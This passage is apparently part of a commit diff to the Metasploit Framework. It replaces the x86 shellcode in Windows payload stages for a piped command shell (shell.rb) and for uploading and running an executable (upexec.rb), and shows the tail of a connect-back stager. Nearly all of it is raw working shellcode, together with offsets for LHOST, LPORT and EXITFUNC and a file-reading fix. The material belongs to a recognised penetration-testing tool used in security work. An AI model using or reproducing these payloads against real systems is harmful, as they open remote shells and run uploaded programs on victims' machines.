"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6" +
"\x81\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00" +
"\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa" +
"\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00" +
"\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05" +
"\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b" +
"\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50\x40" +
"\x50\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11" +
"\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06" +
"\x56\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53" +
"\x57\xff\x55\x18\xff\xd3"
'Offsets' => { 'LHOST' => [ 196, 'ADDR' ], 'LPORT' => [ 203, 'n' ], },
'RequiresMidstager' => false,
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
"\xD5\x89\xC7\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A" +
"\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57" +
"\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00" +
"\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x53\x6A\x00\x56" +
"\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75" +
"\xEC\xC3"
}
))
end

50
modules/payloads/stages/windows/shell.rb
View File

@ -22,7 +22,7 @@ module Metasploit3
'Name' => 'Windows Command Shell',
'Version' => '$Revision$',
'Description' => 'Spawn a piped command shell',
'Author' => 'spoonm',
'Author' => [ 'spoonm', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
@ -35,39 +35,23 @@ module Metasploit3
{
'Offsets' =>
{
'EXITFUNC' => [ 443, 'V' ]
'EXITFUNC' => [ 210, 'V' ]
},
'Payload' =>
"\x68\x33\x32\x00\x00\x68\x57\x53\x32\x5f\x57\xfc\xe8\x4c\x00\x00"+
"\x00\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b"+
"\x4f\x18\x8b\x5f\x20\x01\xeb\xe3\x30\x49\x8b\x34\x8b\x01\xee\x31"+
"\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54"+
"\x24\x24\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c"+
"\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc2\x08\x00\x6a\x30\x59"+
"\x64\x8b\x31\x8b\x76\x0c\x8b\x76\x1c\xad\x8b\x58\x08\x5e\x53\x68"+
"\x8e\x4e\x0e\xec\xff\xd6\x97\x53\x56\x57\x8d\x44\x24\x10\x50\xff"+
"\xd7\x50\x50\x50\x68\xb6\x19\x18\xe7\xff\xd6\x97\x68\xa4\x19\x70"+
"\xe9\xff\xd6\x95\x68\x08\x92\xe2\xed\xff\xd6\x50\x57\x55\x83\xec"+
"\x10\x89\xe5\x89\xee\x6a\x01\x6a\x00\x6a\x0c\x89\xe1\x6a\x00\x51"+
"\x56\xad\x56\x53\x68\x80\x8f\x0c\x17\xff\x55\x20\x89\xc7\xff\xd0"+
"\x89\xe0\x6a\x00\x50\x8d\x75\x08\x56\x8d\x75\x0c\x56\xff\xd7\x68"+
"\x43\x4d\x44\x00\x89\xe2\x31\xc0\x8d\x7a\xac\x6a\x15\x59\xf3\xab"+
"\x83\xec\x54\xc6\x42\xbc\x44\x66\xc7\x42\xe8\x01\x01\x8b\x75\x08"+
"\x89\x72\xfc\x89\x72\xf8\x8b\x75\x04\x89\x72\xf4\x8d\x42\xbc\x54"+
"\x50\x51\x51\x51\x41\x51\x49\x51\x51\x52\x51\x53\x68\x72\xfe\xb3"+
"\x16\xff\x55\x20\xff\xd0\x31\xc0\xb4\x04\x96\x29\xf4\x89\xe7\x6a"+
"\x64\x53\x68\xb0\x49\x2d\xdb\xff\x55\x20\xff\xd0\x31\xc0\x50\x57"+
"\x50\x50\x50\xff\x75\x0c\x53\x68\x11\xc4\x07\xb4\xff\x55\x20\xff"+
"\xd0\x85\xc0\x74\x74\x31\xc0\x3b\x07\x74\x36\xe8\x77\x00\x00\x00"+
"\x50\x89\xe1\x50\x51\x56\x57\xff\x75\x0c\x53\x68\x16\x65\xfa\x10"+
"\xff\x55\x20\xff\xd0\x85\xc0\x74\x50\x31\xc0\x59\x39\xc8\x74\x11"+
"\x50\x51\x57\xff\x75\x28\xff\x55\x10\x31\xc9\x39\xc8\x7c\x3a\xeb"+
"\xab\x89\xe0\xe8\x3f\x00\x00\x00\x31\xc0\x50\x56\x57\xff\x75\x28"+
"\xff\x55\x14\x31\xc9\x39\xc8\x7c\x86\x74\x1e\x51\x89\xe2\x51\x52"+
"\x50\x57\xff\x75\x00\x53\x68\x1f\x79\x0a\xe8\xff\x55\x20\xff\xd0"+
"\x85\xc0\x74\x05\x31\xc0\x59\xeb\xc8\x53\x68\x7e\xd8\xe2\x73\xff"+
"\x55\x20\x31\xc9\x51\xff\xd0\x50\x54\x68\x7e\x66\x04\x80\xff\x75"+
"\x28\xff\x55\x18\x85\xc0\x58\x75\xe0\xc3"
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
"\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x31\xF6\x6A\x12\x59\x56" +
"\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01\x8D\x44\x24\x10\xC6\x00\x44" +
"\x54\x50\x56\x56\x56\x46\x56\x4E\x56\x56\x53\x56\x68\x79\xCC\x3F" +
"\x86\xFF\xD5\x89\xE0\x4E\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF" +
"\xD5\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C" +
"\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
}
))
end

62
modules/payloads/stages/windows/upexec.rb
View File

@ -22,7 +22,7 @@ module Metasploit3
'Name' => 'Windows Upload/Execute',
'Version' => '$Revision$',
'Description' => 'Uploads an executable and runs it',
'Author' => 'vlad902',
'Author' => ['vlad902', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
@ -31,34 +31,33 @@ module Metasploit3
{
'Offsets' =>
{
'EXITFUNC' => [ 385, 'V' ]
'EXITFUNC' => [ 368, 'V' ]
},
'Payload' =>
"\x81\xec\x40\x00\x00\x00\xfc\x89\xfb\xe8\x48\x00\x00\x00\x60\x8b" +
"\x6c\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b" +
"\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0" +
"\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b" +
"\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b" +
"\x89\x6c\x24\x1c\x61\xc3\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b" +
"\x70\x1c\xad\x8b\x40\x08\x50\x89\xe6\x68\x8e\x4e\x0e\xec\xff\x36" +
"\xff\x56\x04\x66\x68\x00\x00\x66\x68\x33\x32\x68\x77\x73\x32\x5f" +
"\x89\xe5\x55\xff\xd0\x89\x46\x08\x68\xb6\x19\x18\xe7\xff\x76\x08" +
"\xff\x56\x04\x89\x46\x0c\x6a\x00\x6a\x04\x55\x53\xff\x56\x0c\x8b" +
"\x7d\x00\xe8\x0b\x00\x00\x00\x43\x3a\x5c\x74\x6d\x70\x2e\x65\x78" +
"\x65\x00\x58\x89\x46\x10\x68\xa5\x17\x00\x7c\xff\x36\xff\x56\x04" +
"\x6a\x00\x6a\x06\x6a\x04\x6a\x00\x6a\x07\x68\x00\x00\x00\xe0\xff" +
"\x76\x10\xff\xd0\x89\x46\x14\x81\xec\x04\x08\x00\x00\x89\xe5\x68" +
"\x1f\x79\x0a\xe8\xff\x36\xff\x56\x04\x89\x46\x18\x6a\x00\x68\x00" +
"\x08\x00\x00\x55\x53\xff\x56\x0c\x29\xc7\x50\x89\xe1\x6a\x00\x51" +
"\x50\x55\xff\x76\x14\xff\x56\x18\x58\x85\xff\x75\xdf\x68\xfb\x97" +
"\xfd\x0f\xff\x36\xff\x56\x04\xff\x76\x14\xff\xd0\x6a\x50\x59\x29" +
"\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42" +
"\x2c\x93\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x36\xff" +
"\x56\x04\x57\x52\x51\x51\x51\x6a\x01\x51\x51\xff\x76\x10\x51\xff" +
"\xd0\x68\xad\xd9\x05\xce\xff\x36\xff\x56\x04\x6a\xff\xff\x37\xff" +
"\xd0\x68\x25\xb0\xff\xc2\xff\x36\xff\x56\x04\xff\x76\x10\xff\xd0" +
"\x68\xe7\x79\xc6\x79\xff\x76\x08\xff\x56\x04\xff\x77\xfc\xff\xd0" +
"\x68\x7e\xd8\xe2\x73\xff\x36\xff\x56\x04\xff\xd0"
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
"\x6A\x7F\x58\xC1\xE0\x03\x29\xC4\x54\x50\x68\x30\xF3\x49\xE4\xFF" +
"\xD5\x8D\x04\x04\xC7\x00\x73\x76\x63\x2E\xC7\x40\x04\x65\x78\x65" +
"\x00\x89\xE0\x50\x6A\x00\x6A\x06\x6A\x02\x6A\x00\x6A\x07\x68\x00" +
"\x00\x00\xE0\x50\x68\xDA\xF6\xDA\x4F\xFF\xD5\x89\xC3\x54\x89\xE6" +
"\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A" +
"\x04\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5" +
"\x53\x53\x89\xE1\x6A\x00\x51\x56\x50\x53\x89\xC3\x6A\x00\x56\x53" +
"\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC" +
"\x68\x2D\x57\xAE\x5B\xFF\xD5\x59\x68\xC6\x96\x87\x52\xFF\xD5\x57" +
"\x57\x57\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01" +
"\x01\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E" +
"\x56\x56\xFF\x74\x24\x78\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0" +
"\x4E\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF\xD5\x57\x68\x75\x6E" +
"\x4D\x61\xFF\xD5\xFF\x74\x24\x58\x68\xD7\x2E\xDD\x13\xFF\xD5\xBB" +
"\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A\x80" +
"\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
}
))
@ -73,7 +72,12 @@ module Metasploit3
#
def handle_connection_stage(conn)
begin
data = ::IO.read(datastore['PEXEC'])
# bug fix for: data = ::IO.read(datastore['PEXEC'])
# the above does not return the entire contents
data = ""
File.open( datastore['PEXEC'], "rb" ) { |f|
data += f.read
}
rescue
print_error("Failed to read executable: #{$!}")